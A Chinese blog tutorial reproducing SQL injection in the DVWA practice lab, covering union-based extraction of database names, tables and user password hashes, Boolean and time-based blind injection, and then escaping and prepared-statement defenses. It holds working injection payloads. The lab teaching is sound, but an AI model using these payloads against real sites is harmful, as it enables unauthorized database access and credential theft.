SQL注入复现——DVWA靶场(有回显 vs 无回显)

已于 2025-05-17 05:17:52 修改
阅读量935 收藏 11
点赞数 30
分类专栏: 网络安全 靶场练习 文章标签: sql 数据库 web安全
于 2025-05-16 20:18:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_84408069/article/details/148015627
版权

SQL注入复现——DVWA靶场实战(有回显 vs 无回显)

一、环境准备

• 访问 http://127.0.0.1/DVWA,登录账号:admin/password
• 在DVWA Security中设置难度为 Low(无防护)。
靶场位置
• 导航至 SQL Injection 模块。
在这里插入图片描述

二、有回显的注入(Union-Based Injection)
1. 探测注入点
• 输入测试:在输入框输入 1,返回用户ID为1的数据。
• 尝试报错:输入 1',观察是否报错(如SQL语法错误)。
• 预期结果:
You have an error in your SQL syntax...
• 结论:存在字符型注入,未过滤单引号。
2. 确定字段数
• 使用 ORDER BY

1' ORDER BY 2 --

• 逐步增加数字(如ORDER BY 3),直到报错。
• 结果:ORDER BY 2正常,ORDER BY 3报错 → 原查询有2列。
3. 联合查询获取数据
• 构造Union Payload:

1' UNION SELECT 1,2 --

• 页面显示 12,说明第1、2列均可回显。
• 提取敏感信息:

 1' UNION SELECT user(), database() --

• 回显结果:

User: root@localhost  
Database: dvwa

4. 获取表名和字段名
• 查询所有表名:

1' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema=database() --

• 关键表:users
• 查询users表的字段:

1' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users' --

• 关键字段:user, password
5. 最终利用(拖库)
• 获取用户名和密码:

1' UNION SELECT user, password FROM users --

• 结果:显示所有用户的密码哈希(如admin的MD5哈希)。

三、无回显的注入(Boolean-Based Blind Injection)
1. 判断盲注可能性
• 输入正常值:1 → 返回 “User ID exists”。
• 输入无效值:999 → 返回 “User ID is MISSING”。
• 结论:无直接回显,但可通过布尔状态(存在/缺失)推断数据。
2. 布尔盲注攻击步骤
• 探测数据库名长度:

1' AND LENGTH(database())=4 --

• 若返回 “User ID exists”,说明数据库名长度为4(dvwa)。
• 逐字符猜解数据库名:

1' AND SUBSTRING(database(),1,1)='d' --

• 通过二分法或遍历字母表(a-z)确定字符。
4. 时间盲注(Time-Based)
• 判断条件:

1' AND IF(SUBSTRING(database(),1,1)='d', SLEEP(5), 0) --

• 若响应延迟5秒,说明首字母为d

四、关键差异总结

对比项有回显的注入无回显的注入
利用条件页面直接显示数据库数据或错误信息仅能通过布尔状态或时间延迟推断数据
攻击效率高(直接获取数据)低(需逐字符猜解)
典型PayloadUNION SELECT 1,2,3AND SUBSTRING(...)='a'
工具推荐手动构造或SqlmapSqlmap(--technique=B--technique=T

五、防御措施复现

  1. 设置DVWA为High难度:
    • 在DVWA Security中选择 High,观察代码变化:
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    • 效果:单引号被转义,注入失效。
  2. 使用预编译语句:
    • 修改源码为参数化查询:
    $stmt = $conn->prepare("SELECT first_name, last_name FROM users WHERE user_id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
    • 效果:彻底杜绝注入。

通过DVWA靶场实战,你可以清晰理解有回显和无回显注入的利用手法及防御逻辑。建议逐步提升难度(Medium/High),并尝试结合Sqlmap自动化验证。

有回显的注入(显示注入)

在这里插入图片描述
在这里插入图片描述

我们可以看到它返回的结果是给我们了个报错信息,就说明这是存在一个有回显的注入(返回给我们了报错信息)

无回显的注入(盲注)

在这里插入图片描述

在这里插入图片描述

我们观察可以发现,它返回的结果并没有像刚刚那样,给我们显示一个报错信息。盲注就是它没有将数据库的报错信息回显给我们。

DVWA靶场SQL Injection(SQL注入
m0_51150495的博客
06-08 1688
1.找到注入点;2.通过找到闭合方式;3.使用order by判断列数;4.使用union select判断示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
DVWA靶场全关卡---SQL注入(low)
weixin_63294541的博客
03-17 694
目录1、找注入点2、盲猜字段3、示4、找数据库5、获取数据库中的表6、查看表中的字段7、示字段的值8、我们就拿到了用户名和密码了! 方法顺序如下: 1' and 1=1 order by 1# 从头开始试,到几报错就是有几个字段减一。 所以,有两个字段。1'union select 1,2# (1'是闭合,union连接,select 1,2是占位) 1'union select 1,database()# -----找到数据库名称为Surname: dvwa 1' unio
DVWA靶场系列(五)—— SQL Injection(SQL注入
qq_45612828的博客
07-14 2261
DVWA靶场系列(五)—— SQL Injection(SQL注入
dvwa靶场SQL Injection(sql注入)全难度教程(附代码分析)
m0_73248913的博客
04-04 1159
dvwa sql注入教程
DVWA靶场通关——SQL Injection篇
m0_74823021的博客
01-20 1015
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
DVWA-sql注入漏洞复现
qq_68238790的博客
12-04 716
SQL注入漏洞是Web层面最高位的漏洞之一。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入
DVWA靶场第九关:SQL注⼊(盲注)(SQL Injection (Blind)
weixin_55270891的博客
02-20 640
抓包将参数id改为1’ and length(database())=4 #,示存在,说明数据库名的⻓度为4个字。然后猜解数据库名:输⼊1’ and length(database())=4 #,示存在:说明⻓度为4。SQL盲注与⼀般注⼊的区别在于⼀般的注⼊攻击者可以直接从⻚⾯上看到注⼊语句的执⾏结果,⽽盲注。可以看到,High级别的代码利⽤cookie传递参数id,当SQL查询结果为空时,会执⾏函数。输⼊1 and 1 =1 和1 and 1 = 2均示存在。可以通过过抓包来实现sql盲注。
DVWA SQL注入漏洞复现
ch258563的博客
04-02 503
DVWA SQL注入漏洞复现
利用漏洞注入--sql注入
Zzzz1855的博客
11-26 1307
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。,这种直接更改后缀的办法确实能够绕过对后缀的检查,但是这样的上传是没有意义的,因为服务器只会根据后缀来识别文件,所以。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。的中级 限制对上传的文件后缀做了安全检查,只允许上传图片,所以在这里需要绕过这个限制上传。在前面的项目中了解到的,当开发人员对用户上传的文件所在的路径不做安全校。
DVWASQL注入
qq_46416934的博客
07-29 1361
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 713
DVWA靶场SQL注入实战
PostgreSQL malformed array literal异常
mojinchuan的专栏
05-15 245
PostgreSQL malformed array literal异常问题分析与处理
在Oracle到GreatSQL迁移中排序规则改变引发的乱码问题分析及解决
GreatSQL2021的博客
05-14 948
Oracle 到 GreatSQL 迁移改排序规则引发乱码?本文深入分析根源,提供方案,助你快速解决,速来一探究竟!
基于Rust语言的Rocket框架和Sqlx库开发WebAPI项目记录(二)
2301_78858267的博客
05-16 577
在params文件夹下依次新建req.rs、resp.rs、result_parse.rs、mod.rs。在src目录下新建params文件夹。
涨薪技术|0到1学会性能测试第64课-SQL监控之Trace选项
m0_60889254的博客
05-14 1484
本文介绍了MSSQL数据库监控与调优技术中的SQLTrace选项使用。SQLServerProfiler跟踪数据库事件时,有多种设置选项,包括输出数据选项、File选项影响、收集时间范围选项和Duration列配置。输出数据选项有五种方式,包括不保存数据、保存到文件系统、保存到数据库表、同时保存到文件系统和数据库表,以及服务器端跟踪保存到文件系统。File选项影响涉及SQLProfiler对被监控SQLServer的开销和遗漏跟踪事件的影响。收集时间范围选项建议明确指定跟踪时间以减少系统开销。Duratio
关于 Web 漏洞原理与利用:1. SQL 注入SQLi)
Triste__chengxi的博客
05-18 741
在绕过技巧作用原理典型例子备注编码绕过URL/Unicode/Hex编码%27 OR 1=1绕过简单字符串检测注释绕过利用 SQL 注释符截断后续语句截断后续合法语句大小写绕过混合大小写关键字绕过大小写敏感规则双写绕过重复字符、转义利用转义规则混淆检测宽字节绕过利用多字节编码字符重叠针对 GBK 等中文编码环境延时注入利用延时函数判断盲注无需报错,仅靠响应时间判断。
Flink Table & SQL
最新发布
╮(╯_╰)╭ Don't expect me to reply to you in time
05-18 540
- 定义带有事件时间的表ts BIGINT,WATERMARK FOR ts AS ts - 1000 -- 定义水印-- 使用滚动窗口进行统计SELECTuser,技术点描述Table API基于 Java/Scala 的函数式 APIFlink SQL支持 ANSI SQL,易于上手管理表和 SQL 的核心类Connectors支持 Kafka、Hive、JDBC、File、Print 等支持事件时间、处理时间Windowing支持滚动、滑动、会话窗口。
LeetCode_sql刷题(3482.分析组织层级)
Darling博客
05-14 796
递归查询
SQLMesh 增量模型从入门到精通:5步实现高效数据处理
neweastsun的专栏
05-16 878
本文深入解析 SQLMesh 中的增量时间范围模型,介绍其核心原理、配置方法及高级特性。通过实际案例说明如何利用该模型提升数据加载效率,降低计算资源消耗,并提供配置示例与最佳实践建议,帮助读者在实际项目中有效应用这一强大功能。
安装过sql注入靶场dvwa靶场搭建过程
03-20
### 一、DVWA靶场的搭建过程 #### 靶场概述 DVWA(Damn Vulnerable Web Application)是一款用于学习和测试Web安全漏洞的应用程序,提供了多种级别的安全性设置以便于用户练习不同的攻击技术[^3]。 #### 环境准备 为了成功运行DVWA,需要先准备好LAMP/LEMP栈环境。如果主机已安装MySQL,则可以单独配置Apache并将其与MySQL关联起来[^2]。以下是具体的组件需求: - **操作系统**:Linux/MacOS/Windows均可支持。 - **Web服务器**:推荐使用Apache或Nginx。 - **数据库管理器**:MySQL或MariaDB。 - **编程语言**:PHP。 #### 安装步骤 1. 下载DVWA源码包至本地目录,并解压到`/var/www/html/`或其他指定路径下。 2. 修改权限以允许Web服务访问该文件夹及其子资源。 ```bash sudo chmod -R 755 /var/www/html/dvwa/ ``` 3. 创建一个新的MySQL数据库DVWA使用,并赋予相应用户的操作权限。 ```sql CREATE DATABASE dvwa; GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa_user'@'localhost' IDENTIFIED BY 'password'; FLUSH PRIVILEGES; ``` 4. 编辑DVWA的核心配置文件——位于`config/config.inc.php`中的连接参数部分,确保其指向刚才创建好的数据库实例[^4]。 ```php $_DVWA['db_server'] = '127.0.0.1'; $_DVWA['db_database'] = 'dvwa'; $_DVWA['db_username'] = 'dvwa_user'; $_DVWA['db_password'] = 'password'; ``` 5. 启动所有必要的后台进程和服务单元,验证能否通过浏览器正常加载初始页面完成初始化向导流程即可正式投入使用。 --- ### 二、SQL注入相关的配置调整 #### 基础概念理解 SQL注入是一种常见的网络安全威胁形式之一,在应用程序未能正确过滤外部输入数据的情况下可能发生此现象。它使得恶意行为者能够执行任意命令或者窃取敏感资料等内容[^1]。 #### 实验场景设定 在低难度模式下,默认情况下不会启用任何防护机制;而随着挑战等级升高会逐步引入更多防御措施比如转义特殊字符等手段来对抗潜在风险因素的影响效果如何变化等问题值得深入探讨研究价值所在之处何方? 例如,在“SQL Injection (Basic)”模块里尝试构造如下GET请求字符串去检索隐藏字段值信息作为入门级案例分析对象进行讲解说明比较好一些吧?当然也可以借助Burp Suite之类的自动化辅助工具来进行更高效精准定位目标位置点位哦! ```http ? id=1 UNION SELECT null,concat_ws('-',version(),user(),database())-- ``` 上述例子展示了如何利用联合查询语句获取当前使用的 MySQL 版本号、登录账户名以及默认选中的 schema 名称三方面综合情况一览无余啊朋友们!不过请注意实际演练过程中务必遵循法律法规框架范围内行事准则哟😊 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值